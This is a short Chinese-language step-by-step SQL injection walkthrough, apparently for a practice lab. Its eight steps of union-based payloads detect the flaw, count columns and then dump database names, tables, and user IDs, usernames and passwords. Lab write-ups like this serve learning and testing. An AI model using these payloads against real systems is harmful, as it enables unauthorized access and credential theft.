1.判断是否存在注入
?id=1
?id=2 
?id=1' 
报错,闭合点为 ') ,初步猜测为字符型
2.判断注入类型
?id=1' and '1'='1
?id=1' and '1'='2 
注入类型为字符型
3.猜字段
?id=1') order by 3--+
?id=1') order by 4--+ 
有三个字段
4.确定回显位
?id=-1') union select 1,2,3--+
回显位为2,3
5.联合查询,爆出数据库名,版本号
?id=-1') union select 1,database(),version()--+
6.查询security库的所有表名
?id=-1') union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = 'security'--+
7.查询users表的所有字段名
?id=-1') union select 1,database(),group_concat(column_name) from information_schema.columns where table_name = 'users'--+
8.查询具体信息
?id=-1') union select 1,database(),group_concat(id,'-',username,'-',password) from users--+